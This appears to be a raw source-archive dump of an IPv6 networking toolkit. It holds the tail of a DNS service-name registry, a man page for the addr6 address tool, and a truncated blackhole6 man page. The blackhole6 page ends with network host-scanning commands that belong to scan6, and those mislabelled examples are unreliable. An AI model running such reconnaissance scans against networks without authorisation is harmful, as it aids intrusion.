Engine (Master),[Bill_Van_Etten],[Bill_Van_Etten],,,,,,Defined TXT keys: None soda,,tcp,Secure On Device API,[Smith_Micro_Software_Inc],[David_Sperling_2],2011-10-10,,,,,"Defined TXT keys: a. ssid= b. bssid=" souschef,,,SousChef Recipe Sharing Protocol,[Ben],[Ben],,,,,,Defined TXT keys: None sparql,,,SPARQL Protocol and RDF Query Language,[Alex_Tucker],[Alex_Tucker],,,,,,"Defined TXT keys: txtvers=1 path= protovers= [if not specified then default is 1.0, corresponding to SPARQL version] binding= [if not specified then default is HTTP] vocabs= [RDF vocabularies or OWL ontologies used by the endpoint] metadata= [to fetch RDF/XML description of SPARQL service]" sqp,,tcp,Square Connect Control Protocol,[Square_Connect_Inc],[Mat_Henshall],2011-10-07,,,,,Defined TXT keys: Proprietary stanza,,,Lexcycle Stanza service for discovering shared books,[Marc_Prud_hommeaux],[Marc_Prud_hommeaux],,,,,,Defined TXT keys: None stickynotes,,,Sticky Notes,[Johnnie_Walker],[Johnnie_Walker],,,,,,Defined TXT keys: None stotp,,tcp,One Time Pad Synchronisation,[softthere_com],[James_Crosby],2011-10-17,,,,,Defined TXT keys: None supple,,,Supple Service protocol,[Dave_Christianson],[Dave_Christianson],,,,,,Defined TXT keys: type url surveillus,,,Surveillus Networks Discovery Protocol,[Mark_Lewis_3],[Mark_Lewis_3],,,,,,Defined TXT keys: None svn,,,Subversion,[CollabNet],[CollabNet],,,,,,Defined TXT keys: None swcards,,,Signwave Card Sharing Protocol,[Signwave_Networking],[Signwave_Networking],,,,,,Defined TXT keys: None switcher,,,Wireless home control remote control protocol,[Steve_Splonskowski],[Steve_Splonskowski],,,,,,Defined TXT keys: None swordfish,,,Swordfish Protocol for Input/Output,[Jim_Wallace],[Jim_Wallace],,,,,,Defined TXT keys: None swyp,,,"Framework for transferring any file from any app, to any app on any device: simply with a swÿp.",[ExoMachina],[Alexander_List],2011-12-06,,,,,Defined TXT keys: NONE sxqdea,,,Synchronize! Pro X,[Qdea],[Qdea],,,,,,Defined TXT keys: None sybase-tds,,,Sybase Server,,,,,,,,Defined TXT keys: None syncopation,,,Syncopation Synchronization Protocol by Sonzea,[Sonzea],[Sonzea],,,,,,Defined TXT keys: None syncqdea,,,Synchronize! X Plus 2.0,[Qdea],[Qdea],,,,,,Defined TXT keys: None synergy,,,Synergy Peer Discovery,[Karl_Timmermann],[Karl_Timmermann],,,,,,Defined TXT keys: None synksharing,,,SynkSharing synchronization protocol,[Benjamin_Rister],[Benjamin_Rister],,,,,,Defined TXT keys: None taccounting,,,Data Transmission and Synchronization,[John_MacMullin],[John_MacMullin],,,,,,Defined TXT keys: None tango,,,Tango Remote Control Protocol,[Tony_Amundson],[Tony_Amundson],,,,,,Defined TXT keys: None tapinoma-ecs,,,Tapinoma Easycontact receiver,[Bonjour],[Bonjour],,,,,,Defined TXT keys: None taskcoachsync,,,Task Coach Two-way Synchronization Protocol for iPhone,[Jerome_Laheurte],[Jerome_Laheurte],,,,,,Defined TXT keys: None tbricks,,,tbricks internal protocol,[Joakim_Johansson],[Joakim_Johansson],,,,,,"Defined TXT keys: txtvers=1, sesna, seid, setype, cosna, coid, cotype, sysna, syna, syid, subsyid, venid, protocols, pid" tcode,,,Time Code,[Marshall_Anschutz],[Marshall_Anschutz],,,,,,Defined TXT keys: None tcu,,,Tracking Control Unit by RPM-PSI,[James_Nikolai],[James_Nikolai],,,,,,Defined TXT keys: None te-faxserver,,,TE-SYSTEMS GmbH Fax Server Daemon,[Tobias_Erichsen],[Tobias_Erichsen],,,,,,Defined TXT keys: Proprietary teamlist,,,ARTIS Team Task,[ARTIS_Software],[ARTIS_Software],,,,,,Defined TXT keys: None teleport,,udp,teleport,[Julien_Robert],[Julien_Robert],,,,,,Defined TXT keys: None tenir-rc,,tcp,Proprietary,[Tenir_Software],[Steve_Gums],2011-10-27,,,,,Defined TXT keys: Proprietary tera-fsmgr,,,Terascala Filesystem Manager Protocol,[Mike_Nuss],[Mike_Nuss],,,,,,Defined TXT keys: Proprietary tera-mp,,,Terascala Maintenance Protocol,[Mike_Nuss],[Mike_Nuss],,,,,,Defined TXT keys: Proprietary test-ok,,tcp,Test Controller Card,[TEST-OK_BV],[Jeroen_Ommering],2012-09-05,,,,,Defined TXT keys: TEST-OK Test Controller Card TCCxxxx tf-redeye,,,ThinkFlood RedEye IR bridge,[Matt_Eagar],[Matt_Eagar],,,,,,Defined TXT keys: None thumbwrestling,,,tinkerbuilt Thumb Wrestling game,[Jamie_Halmick],[Jamie_Halmick],,,,,,Defined TXT keys: None ticonnectmgr,,,TI Connect Manager Discovery Service,[Stephen_Reid],[Stephen_Reid],,,,,,Defined TXT keys: None tinavigator,,,TI Navigator Hub 1.0 Discovery Service,[Stephen_Reid],[Stephen_Reid],,,,,,Defined TXT keys: None tivo-device,,tcp,TiVo Device Protocol,[TiVo_Inc],[Developer_Support_2],2011-10-18,,,,,Defined TXT keys: None tivo-hme,,,TiVo Home Media Engine Protocol,[Developer_Support],[Developer_Support],,,,,,Defined TXT keys: None tivo-mindrpc,,tcp,TiVo RPC Protocol,[TiVo_Inc],[Developer_Support_2],2011-10-18,,,,,Defined TXT keys: None tivo-music,,,TiVo Music Protocol,[Developer_Support],[Developer_Support],,,,,,Defined TXT keys: None tivo-photos,,,TiVo Photos Protocol,[Developer_Support],[Developer_Support],,,,,,Defined TXT keys: None tivo-remote,,,TiVo Remote Protocol,[Developer_Support],[Developer_Support],,,,,,"Defined TXT keys: protocol, path, swversion, platform, TSN" tivo-videos,,,TiVo Videos Protocol,[Developer_Support],[Developer_Support],,,,,,"Defined TXT keys: protocol, path, swversion, platform, TSN" todogwa,,,2Do Sync Helper Tool for Mac OS X and PCs,[Fahad_Gilani],[Fahad_Gilani],,,,,,Defined TXT keys: None tomboy,,,Tomboy,[Alex_Graveley],[Alex_Graveley],,,,,,Defined TXT keys: None toothpicserver,,,ToothPics Dental Office Support Server,[Milton_Pulis],[Milton_Pulis],,,,,,Defined TXT keys: None touch-able,,,iPhone and iPod touch Remote Controllable,[Amandeep_Jawa_3],[Amandeep_Jawa_3],,,,,,"Defined TXT keys: txtvers, CtlN, DbId, Ver, DvTy, OSsi, DvSv" touch-remote,,,iPhone and iPod touch Remote Pairing,[Amandeep_Jawa_3],[Amandeep_Jawa_3],,,,,,"Defined TXT keys: txtvers, DvNm, Pair, RemV, RemN, DvTy" tptx-console,,tcp,Coordination service for client users of the TotalPraisTrax iPad application,[Randy_Davenport],[Chris_Watson],2014-03-04,,,,,Defined TXT keys: None transmitr,,tcp,Service discovery and media transfer for peer to peer mobile media transfer app,[Windward_Code_LLC],[Alex_Belliotti],2013-11-27,,,,,Defined TXT keys: None tri-vis-client,,,triCerat Simplify Visibility Client,[Christopher_Karper],[Christopher_Karper],,,,,,Defined TXT keys: None tri-vis-server,,,triCerat Simplify Visibility Server,[Christopher_Karper],[Christopher_Karper],,,,,,Defined TXT keys: None tryst,,,Tryst,[Francisco_Ryan_Tolma],[Francisco_Ryan_Tolma],,,,,,Defined TXT keys: None tsbiis,,tcp,The Social Broadband Interference Information Sharing,[Sergio_Luis],[Sergio_Luis],2012-02-27,,,,,Defined TXT keys: there is no TXT keys defined for this protocol tt4inarow,,,Trivial Technology's 4 in a Row,[Nicolas_Payette],[Nicolas_Payette],,,,,,Defined TXT keys: None ttcheckers,,,Trivial Technology's Checkers,[Nicolas_Payette],[Nicolas_Payette],,,,,,Defined TXT keys: None ttp4daemon,,,TechTool Pro 4 Anti-Piracy Service,[Micromat],[Micromat],,,,,,Defined TXT keys: None tunage,,,Tunage Media Control Service,[Matt_Patenaude],[Matt_Patenaude],,,,,,Defined TXT keys: None tuneranger,,,TuneRanger,[Acertant],[Acertant],,,,,,Defined TXT keys: None twinlevel,,tcp,detect sanitary product,[Oblamatik_AG],[Simon_Ensslen],2012-09-05,,,,,Defined TXT keys: None tzrpc,,tcp,TZ-Software remote procedure call based synchronization protocol,[Thomas_Zwick],[Thomas_Zwick],2011-10-12,,,,,Defined TXT keys: Proprietary ubertragen,,,Ubertragen,[Widgetschmie_de],[Widgetschmie_de],,,,,,Defined TXT keys: None uddi,,,"Universal Description, Discovery and Integration",[Paul_Denning],[Paul_Denning],,,,,,Defined TXT keys: TBD uddi-inq,,,"Universal Description, Discovery and Integration Inquiry",[Paul_Denning],[Paul_Denning],,,,,,Defined TXT keys: TBD uddi-pub,,,"Universal Description, Discovery and Integration Publishing",[Paul_Denning],[Paul_Denning],,,,,,Defined TXT keys: TBD uddi-sub,,,"Universal Description, Discovery and Integration Subscription",[Paul_Denning],[Paul_Denning],,,,,,Defined TXT keys: TBD uddi-sec,,,"Universal Description, Discovery and Integration Security",[Paul_Denning],[Paul_Denning],,,,,,Defined TXT keys: TBD upnp,,,Universal Plug and Play,[Andrew_Donoho],[Andrew_Donoho],,,,,,Defined TXT keys: None urlbookmark,,,URL Advertising,[Sven_S_Porst],[Sven_S_Porst],,,,,,"Defined TXT keys: URL=, name=" uswi,,,Universal Switching Corporation products,[Roger_Lemberg],[Roger_Lemberg],,,,,,Defined TXT keys: None utest,,,uTest,[Gregory_Power],[Gregory_Power],,,,,,Defined TXT keys: None uwsgi,,,Unbit Web Server Gateway Interface,[Roberto_De_Ioris],[Roberto_De_Ioris],,,,,,Defined TXT keys: None ve-decoder,,,American Dynamics VideoEdge Decoder Control Service,[Gary_Sands],[Gary_Sands],,,,,,"Defined TXT keys: txtvers, macaddress, protovers, model, serial, path, idp" ve-encoder,,,American Dynamics VideoEdge Encoder Control Service,[Gary_Sands],[Gary_Sands],,,,,,"Defined TXT keys: txtvers, macaddress, protovers, model, serial, path, idp" ve-recorder,,,American Dynamics VideoEdge Recorder Control Service,[Gary_Sands],[Gary_Sands],,,,,,"Defined TXT keys: txtvers, macaddress, protovers, model, serial, path, idp" vedabase,,tcp,Application specific synchronization protocol,[Peter_Kollath_2],[Peter_Kollath_2],2014-05-27,,,,,Defined TXT keys: txtvers=1 virtualdj,,,VirtualDJ Remote Control protocol,[Atomix_Productions],[Stephane_Clavel],2011-10-12,,,,,Defined TXT keys: None visel,,,visel Q-System services,[Lehpaner_Sasa],[Lehpaner_Sasa],,,,,,"Defined TXT keys: Version= Type= Name= Zone= ID= SString= SString1=" vos,,,Virtual Object System (using VOP/TCP),[Reed_Hedges][Peter_Amstutz],[Reed_Hedges][Peter_Amstutz],,,,,,"Defined TXT keys: url= type= title= descr=" vue4rendercow,,,VueProRenderCow,,,,,,,,Defined TXT keys: None vxi-11,,,VXI-11 TCP/IP Instrument Protocol,[Nick_Barendt_2],[Nick_Barendt_2],,,,,,Defined TXT keys: None wakeywakey,,tcp,Proprietary,[gerry_Brown_associates],[Gerry_Brown],2012-11-29,,,,,Defined TXT keys: None walkietalkie,,,Walkie Talkie,[Johan_Kool],[Johan_Kool],,,,,,Defined TXT keys: None wd-2go,,tcp,NAS Service Protocol,[Western_Digital],[Rajesh_Batra],2012-07-11,,,,,Defined TXT keys: None we-jell,,,Proprietary collaborative messaging protocol,[Vaughn_Amann],[Vaughn_Amann],,,,,,"Defined TXT keys: user= stat= agent=" webdav,,,World Wide Web Distributed Authoring and Versioning (WebDAV),[Y_Y_Goland],[Y_Y_Goland],,,,,,Defined TXT keys: u= p= path= webdavs,,,WebDAV over SSL/TLS,[Y_Y_Goland],[Y_Y_Goland],,,,,,Defined TXT keys: u= p= path= webissync,,,WebIS Sync Protocol,[Alex_Kac],[Alex_Kac],,,,,,Defined TXT keys: None wedraw,,,weDraw document sharing protocol,[Oleksandr_Zakharchuk],[Oleksandr_Zakharchuk],,,,,,Defined TXT keys: None whamb,,,Whamb,[Whamb],[Whamb],,,,,,Defined TXT keys: None whistler,,,Honeywell Video Systems,[Shankar_Prasad_2],[Shankar_Prasad_2],,,,,,Defined TXT keys: None wicop,,udp,WiFi Control Platform,[Santorini_LLC],[Cameron_Colpitts],2011-10-25,,,,,"Defined TXT keys: state= loc=" witap,,,WiTap Sample Game Protocol,[Rory_McGuire_2],[Rory_McGuire_2],,,,,,Defined TXT keys: None witapvoice,,,witapvoice,[Roberto_Garcia],[Roberto_Garcia],,,,,,Defined TXT keys: None wkgrpsvr,,,Workgroup Server Discovery,[Forest_Hill],[Forest_Hill],,,,,,Defined TXT keys: None workstation,,,Workgroup Manager,[Kevin_Arnold],[Kevin_Arnold],,,,,,Defined TXT keys: None wormhole,,,Roku Cascade Wormhole Protocol,[Don_Woodward],[Don_Woodward],,,,,,Defined TXT keys: txtvers=1 workgroup,,,Novell collaboration workgroup,[Brady_Anderson],[Brady_Anderson],,,,,,Defined TXT keys: version=? description=? writietalkie,,,Writie Talkie Data Sharing,[Yin_Ki_Lau],[Yin_Ki_Lau],,,,,,Defined TXT keys: None ws,,,Web Services,[Andrew_Donoho],[Andrew_Donoho],,,,,,Defined TXT keys: None wtc-heleos,,,Wyatt Technology Corporation HELEOS,[Brent_Fulgham],[Brent_Fulgham],,,,,,Defined TXT keys: None wtc-qels,,,Wyatt Technology Corporation QELS,[Brent_Fulgham],[Brent_Fulgham],,,,,,Defined TXT keys: None wtc-rex,,,Wyatt Technology Corporation Optilab rEX,[Roy_Reapor],[Roy_Reapor],,,,,,Defined TXT keys: None wtc-viscostar,,,Wyatt Technology Corporation ViscoStar,[Roy_Reapor],[Roy_Reapor],,,,,,Defined TXT keys: None wtc-wpr,,,Wyatt Technology Corporation DynaPro Plate Reader,[Brent_Fulgham],[Brent_Fulgham],,,,,,Defined TXT keys: None wwdcpic,,,PictureSharing sample code,[Marc_Krochmal],[Marc_Krochmal],,,,,,Defined TXT keys: None x-on,,,x-on services synchronisation protocol,[Matthias_Burghardt],[Matthias_Burghardt],,,,,,Defined TXT keys: Proprietary x-plane9,,udp,x-plane9,[Austin_Meyer],[Austin_Meyer],,,,,,Defined TXT keys: None xcodedistcc,,,Xcode Distributed Compiler,[Scott_Tooker],[Scott_Tooker],,,,,,Defined TXT keys: None xential,,tcp,xential document creation services,[Xential],[Michiel_Terpstra],2013-11-13,,,,,Defined TXT keys: None xgate-rmi,,,xGate Remote Management Interface,[Tim_Jobling],[Tim_Jobling],,,,,,"Defined TXT keys: tech=value (string) model=value (string) version=value (string)" xmiserver,,tcp,XMI Systems home terminal local connection,[XMI_Systems_SA],[CLAUDE_MALLY],2013-01-18,,,,,Defined TXT keys: coucou xmp,,,Xperientia Mobile Protocol,[Henric_Bergh],[Henric_Bergh],2007-01,,,,,"Defined TXT keys: txtvers, user, system, nodeid, desc" xsanclient,,,Xsan Client,[Jeff_Albouze],[Jeff_Albouze],,,,,,Defined TXT keys: None xsanserver,,,Xsan Server,[Jeff_Albouze],[Jeff_Albouze],,,,,,Defined TXT keys: None xsansystem,,,Xsan System,[Jeff_Albouze],[Jeff_Albouze],,,,,,Defined TXT keys: None xtimelicence,,,xTime License,[AppMac_Software],[AppMac_Software],,,,,,Defined TXT keys: None xtshapro,,,xTime Project,[AppMac_Software],[AppMac_Software],,,,,,Defined TXT keys: None xul-http,,,XUL (XML User Interface Language) transported over HTTP,[Eran_Gampel],[Eran_Gampel],,,,,,Defined TXT keys: u= p= path= (Same as for _http._tcp) yakumo,,udp,Yakumo iPhone OS Device Control Protocol,[Daniel_Heffernan],[Daniel_Heffernan],,,,,,Defined TXT keys: None z-wave,,tcp,Z-Wave Service Discovery,[Sigma_Designs_Inc],[Anders_Brandt_2],2011-10-03,,,,,"Defined TXT keys: NIF, EP, LM" z-wave,,udp,Z-Wave Service Discovery,[Sigma_Designs_Inc],[Anders_Brandt_2],2011-10-03,,,,,"Defined TXT keys: NIF, EP, LM" zeromq,,tcp,High performance brokerless messaging,[Daniel_Holth],[Daniel_Holth],2012-04-24,,,,,"Defined TXT keys: type, app, label, note" zeromq,,udp,High performance brokerless messaging,[Daniel_Holth],[Daniel_Holth],2012-04-24,,,,,"Defined TXT keys: type, app, label, note" zigbee-bridge,,tcp,ZigBee Bridge device,[ZigBee_Alliances_Network_Device_working_group],[Leslie_Mulder],2013-05-28,,,,,Defined TXT keys: see: http://www.zigbee.org/Standards/ZigBeeNetworkDevices zigbee-bridge,,udp,ZigBee Bridge device,[ZigBee_Alliances_Network_Device_working_group],[Leslie_Mulder],2013-05-28,,,,,Defined TXT keys: see: http://www.zigbee.org/Standards/ZigBeeNetworkDevices zigbee-gateway,,tcp,ZigBee IP Gateway,[ZigBee_Alliances_Network_Device_working_group],[Leslie_Mulder],2013-05-28,,,,,Defined TXT keys: see: http://www.zigbee.org/Standards/ZigBeeNetworkDevices zigbee-gateway,,udp,ZigBee IP Gateway,[ZigBee_Alliances_Network_Device_working_group],[Leslie_Mulder],2013-05-28,,,,,Defined TXT keys: see: http://www.zigbee.org/Standards/ZigBeeNetworkDevices ipv6toolkit-2.0+ds.1/manuals/000077500000000000000000000000001254360455000160525ustar00rootroot00000000000000ipv6toolkit-2.0+ds.1/manuals/addr6.1000066400000000000000000000242741254360455000171450ustar00rootroot00000000000000.TH ADDR6 1 .SH NAME addr6 \- An IPv6 address analysis and manipulation tool .SH SYNOPSIS .B addr6 .RB [\| \-a .IR IPV6_ADDR\| \ \-i] .RB [\| \-d \|] .RB [\| \-d \|] .RB [\| \-q \|] .RB [\| \-s \|] .RB [\| \-j .IR PREFIX \|] .RB [\| \-b .IR TYPE \|] .RB [\| \-k .IR SCOPE \|] .RB [\| \-w .IR UNICAST_TYPE \|] .RB [\| \-g .IR IID_TYPE \|] .RB [\| \-J .IR PREFIX \|] .RB [\| \-B .IR TYPE \|] .RB [\| \-K .IR SCOPE \|] .RB [\| \-W .IR UNICAST_TYPE \|] .RB [\| \-G .IR IID_TYPE \|] .RB [\| \-v \|] .RB [\| \-h \|] .SH DESCRIPTION .B addr6 is an IPv6 address analysis tool tool. It can employed identify the address type/scope, and infer the type of Interface ID employed by an IPv6 address. Additionally, .B addr6 can also produce statistics about a set of IPv6 addresses. .B addr6 can filter lists of IPv6 addresses based on a number of criteria (address type, address scope, prefixes, duplicate addresses, etc.). There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and IPv6 addresses matching any of those filters will be discarded. If any "accept filter" is specified, any IPv6 address matching that filter will be accepted (and printed on stdout). .SH OPTIONS .B addr6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-stdin"). .TP .BI \-a\ IPV6_ADDRESS ,\ \-\-address\ IPV6_ADDRESS This option ca be employed to specify a single IPv6 address that is meant to be processed by the tool. This option is typically employed in conjunction with the '\-d' tool, to decode the IPv6 address in question. .TP .BR \-i ,\ \-\-stdin This option request the tool to read IPv6 addresses from standard input (stdin), until an EOF (End-Of-File) condition is found. .TP .BI \-j\ PREFIX ,\ \-\-accept\ PREFIX Accept IPv6 addresses belonging to the specified IPv6 prefix (PREFIX/LEN). .TP .BI \-b\ TYPE ,\ \-\-accept\-type\ TYPE Accept IPv6 addresses belonging to the specified address type. Valid address types are: * unicast * unspec * multicast .TP .BI \-k\ SCOPE ,\ \-\-accept\-scope\ SCOPE Accept IPv6 addresses belonging to the specified address scope. Valid address scopes are: * reserved * interface (or "interface-local) * link (or "link-local") * admin (or "admin-local") * site (or "site-local") * admin (or "admin-local") * organization (or "organization-local") * global * unassigned * unspecified .TP .BI \-w\ UNICAST_TYPE ,\ \-\-accept\-utype\ UNICAST_TYPE Accept IPv6 addresses belonging to the specified unicast type. Valid unicast address types are: * loopback * ipv4-compat * ipv4-mapped * link-local * site-local * unique-local * 6to4 * teredo * global .TP .BI \-g\ IID_TYPE ,\ \-\-accept\-iid\ IID_TYPE Accept unicast IPv6 addresses with an Interface ID of the specified type. Valid Interface ID types are: * ieee * isatap * ipv4-32 * ipv4-64 * ipv4-all * embed-port * embed-port-rev * embed-port-all * low-byte * byte-pattern * random .TP .BI \-J\ PREFIX ,\ \-\-block\ PREFIX Block IPv6 addresses belonging to the specified IPv6 prefix (PREFIX/LEN). .TP .BI \-B\ TYPE ,\ \-\-block\-type\ TYPE Block IPv6 addresses belonging to the specified address type. Valid address types are: * unicast * unspec * multicast .TP .BI \-K\ SCOPE ,\ \-\-block\-scope\ SCOPE Block IPv6 addresses belonging to the specified address scope. Valid address scopes are: * reserved * interface (or "interface-local) * link (or "link-local") * admin (or "admin-local") * site (or "site-local") * admin (or "admin-local") * organization (or "organization-local") * global * unassigned * unspecified .TP .BI \-W\ UNICAST_TYPE ,\ \-\-block\-utype\ UNICAST_TYPE Block IPv6 addresses belonging to the specified unicast type. Valid unicast address types are: * loopback * ipv4-compat * ipv4-mapped * link-local * site-local * unique-local * 6to4 * teredo * global .TP .BI \-G\ IPV6_ADDRESS ,\ \-\-block\-iid\ IID_TYPE Block unicast IPv6 addresses with an Interface ID of the specified type. Valid Interface ID types are: * ieee * isatap * ipv4-32 * ipv4-64 * ipv4-all * embed-port * embed-port-rev * embed-port-all * low-byte * byte-pattern * random .TP .BR \-q ,\ \-\-print\-unique This option causes the tool to eliminate duplicate addresses from the list of IPv6 addresses read from standard input (stdin). That is, when reading a list of addresses from stdin, only the first "copy" of each address will be processed by the tool (with later ones being simply ignored). .TP .BR \-c ,\ \-\-print\-canonic This option request the tool to print the IPv6 address specfied with the '\-a' option (or a list of addresses read froom stdin if the '\-i' option was set) in its canonic form. This is useful to before comparing textual representations of IPv6 addresses, since the same address can usually be written in multiple different ways. .TP .BR \-d ,\ \-\-print\-decode This option request the tool to decode the IPv6 address specfied with the '\-a' option (or a list of addresses read froom stdin if the '\-i' option was set). The current version of the tool supports only decode type, in which information is printed for each address with the following syntax: AddressType=AddressSubtype=Scope=IIDType=IIDSubtype This simple syntax is meant to be easy for scripting purposes. Future versions of the tool will incorporate a human-friendly mode. .TP .BR \-s\| ,\ \-\-print\-stats This option requests the tool to produce address statistics from the list of IPv6 addresses read from standard input. This option should be used in conjunction with the '\-i' option, such that multiple addresses can be given as input to addr6. addr6 will always print the total number of IPv6 addresses that have been examined, and the percentage of unicast, multicast, and unspecified (::) addresses. If at least one unicast address is identified, unicast-specific statistics will be printed. In the same way, if at least one multicast address is identified, then multicast-specific statistics will be printed. Unicast-specific statistics include: 1) Number and percentage of each unicast address type (global unicast, link-local unicast, 6to4, Teredo, etc.). 2) Number and percentage of each of the different Interface ID types (IEEE-based, low-byte, etc.). Only those unicast address types for which there are multiple possible types of Interface-IDs will be considered for the Interface-ID assessment. Namely, * 6to4 * Global Unicast * Link-local Unicast * Site-local unicast addresses (deprecated) * Unique local unicast addresses Unicast address types such as 'Teredo' are not considered by this analysis, since they have a single type of Interface-ID, as specified by the corresponding specifications. Multicast-specific statistics include: 1) Number of addresses and percentage of each multicast address type (Permanent, Embedded-RP, etc). 2) Number addresses and percentage of each of the multicast address scope different Interface ID types (Link, Interfa- ce, Global, etc.) .TP .BR \-v\| ,\ \-\-verbose This option selects the "verbosity" of the tool. If this option is left unspecified, only minimum information is printed. .TP .BR \-h\| ,\ \-\-help Print help information for the .B addr6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B addr6 tool. \fBExample #1\fR $ cat addresslist.txt | addr6 \-i \-q addr6 will read IPv6 addresses from stdin ('\-i' option), and will only print the first instance of each address ('\-q' option), thus effectively removing any duplicates from the list. Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. \fBExample #2\fR $ addr6 \-a fc00::1 Decode the IPv6 address specified with the '\-a' option. Note that while the '\-d' option was not set, this is the default behavior of the tool (unless overridden y another option). \fBExample #3\fR $ cat addresslist.txt | addr6 \-i \-q \-s addr6 will read IPv6 addresses from stdin ('\-i' option), will ignore duplicate addresses ('\-q' option), and will print statistics about the processed IPv6 addresses. Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. \fBExample #4\fR $ cat addresslist.txt | addr6 \-i \-q \-d addr6 will read IPv6 addresses from stdin ('\-i' option), will ignore duplicate addresses ('\-q' option), and will decode each of the remaining addresses. Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. \fBExample #5\fR $ cat addresslist.txt | addr6 \-i \-j 2001:db8::/16 addr6 will read IPv6 addresses from stdin ('\-i' option), will discard any addresses that do not belong to the prefix 2001:db8::/16 (i.e., it will "accept" addresses belonging to such prefix). Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. .SH SEE ALSO .BR ipv6toolkit.conf (5) draft-ietf-opsec-ipv6\-host-scanning (available at: .IR ) for a discussion of different IPv6 address patterns. .SH AUTHOR The .B addr6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/blackhole6.1000066400000000000000000000175221254360455000201550ustar00rootroot00000000000000.TH BLACKHOLE6 1 .SH NAME blackhole6 \- A tool to find IPv6 blackholes .SH SYNOPSIS .B blackhole6 .RB DESTINATION\| .IR [PARAMETERS \|] .SH DESCRIPTION .B blackhole6 is a tool to isolate IPv6 blackholes. \fBSCRIPTS\fR \fBget\-mx\fR This script takes no further arguments, and operates as follows: .sp .RS 4 .nf \+ The tool reads domain names from standard-input (oner per line), \ and obtains the MX for the corresponding domain. \+ Lines where the first non-blank character is the numeral sign (#) \ are consdered to contain comments, and hence are ignored. \+ The format of the resulting output is: .fi .RE .sp .RS 4 .nf # DOMAIN_NAME (CANONIC_NAME) MX_RECORD_1 MX_RECORD_2 .fi .RE \fBget\-ns\fR This script takes no further arguments, and operates as follows: .sp .RS 4 .nf \+ The tool reads domain names from standard-input (oner per line), \ and obtains the NS records for the corresponding domain. \+ Lines where the first non-blank character is the numeral sign (#) \ are consdered to contain comments, and hence are ignored. \+ The format of the resulting output is: .fi .RE .sp .RS 4 .nf # DOMAIN_NAME (CANONIC_NAME) MX_RECORD_1 MX_RECORD_2 .fi .RE \fBtrace-do8-tcp\fR \fBtrace-do8-icmp\fR \fBtrace-do256-tcp\fR \fBtrace-do256-icmp\fR These scripts are meant to obtain information about where in the network packets employing IPv6 Extension Headers are being dropped. They test the path with IPv6 packets containing TCP or ICMPv6 payloads and a Destination Options Header of 8 or 256 bytes. Based on the obtained results, the tool can infer what is the system causing the packet drops. \fBtrace-hbh8-tcp\fR \fBtrace-hbh8-icmp\fR \fBtrace-hbh256-tcp\fR \fBtrace-hbh256-icmp\fR These scripts are meant to obtain information about where in the network packets employing IPv6 Extension Headers are being dropped. They test the path with IPv6 packets containing TCP or ICMPv6 payloads and a Hop-by-Hop Options Header of 8 or 256 bytes. Based on the obtained results, the tool can infer what is the system causing the packet drops. \fBtrace-fh256-tcp\fR \fBtrace-fh256-icmp\fR These scripts are meant to obtain information about where in the network packets employing IPv6 Extension Headers are being dropped. They test the path with IPv6 packets containing TCP or ICMPv6 payloads resulting in IPv6 fragments of around 256 bytes. Based on the obtained results, the tool can infer what is the system causing the packet drops. \fBtrace-do8-tcp-stdin\fR \fBtrace-do8-icmp-stdin\fR \fBtrace-do256-tcp-stdin\fR \fBtrace-do256-icmp-stdin\fR These scripts are meant to obtain information about where in the network packets employing IPv6 Extension Headers are being dropped. They test the path with IPv6 packets containing TCP or ICMPv6 payloads and a Destination Options Header of 8 or 256 bytes. Based on the obtained results, the tool can infer what is the system causing the packet drops. These tools read one IPv6 address per line form standard input and, for each of those addresses, information is printed with the following syntax: \fBtrace-hbh8-tcp-stdin\fR \fBtrace-hbh8-icmp-stdin\fR \fBtrace-hbh256-tcp-stdin\fR \fBtrace-hbh256-icmp-stdin\fR These scripts are meant to obtain information about where in the network packets employing IPv6 Extension Headers are being dropped. They test the path with IPv6 packets containing TCP or ICMPv6 payloads and a Hop-by-Hop Options Header of 8 or 256 bytes. Based on the obtained results, the tool can infer what is the system causing the packet drops. These tools read one IPv6 address per line form standard input and, for each of those addresses, information is printed with the following syntax: \fBtrace-fh256-tcp-stdin\fR \fBtrace-fh256-icmp-stdin\fR These scripts are meant to obtain information about where in the network packets employing IPv6 Extension Headers are being dropped. They test the path with IPv6 packets containing TCP or ICMPv6 payloads resulting in IPv6 fragments of around 256 bytes. Based on the obtained results, the tool can infer what is the system causing the packet drops. These tools read one IPv6 address per line form standard input and, for each of those addresses, information is printed with the following syntax: .TP .BR \-h\| ,\ \-\-help Print help information for the .B scan6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B script6 tool. \fBExample #1\fR # scan6 \-i eth0 \-L \-e \-v Perform host scanning on the local network ("\-L" option) using interface "eth0" ("\-i" option). Use both ICMPv6 echo requests and unrecognized IPv6 options of type 10xxxxxx (default). Print link-link layer addresses along with IPv6 addresses ("\-e" option). Be verbose ("\-v" option). \fBExample #2\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-virtual\-machines all \-\-ipv4\-host 10.10.10.0/24 Scan for virtual machines (both VirtualBox and vmware) in the prefix 2001:db8::/64. The additional information about the IPv4 prefix employed by the host system is leveraged to reduce the search space. \fBExample #3\fR # scan6 \-d 2001:db8::/64 \-\-tgt\-ipv4\-embedded ipv4\-32 \-\-ipv4\-host 10.10.10.0/24 Scan for IPv6 addresses of the network 2001:db8::/64 that embed the IPv4 prefix 10.10.10.0/24 (with the 32-bit encoding). \fBExample #4\fR # scan6 \-d 2001:db8:0\-500:0\-1000 Scan for IPv6 addresses of the network 2001:db8::/64, varying the two lowest order 16\-bit words of the addresses in the range 0\-500 and 0\-1000, respectively. \fBExample #5\fR # scan6 \-d fc00::/64 \-\-tgt\-vendor 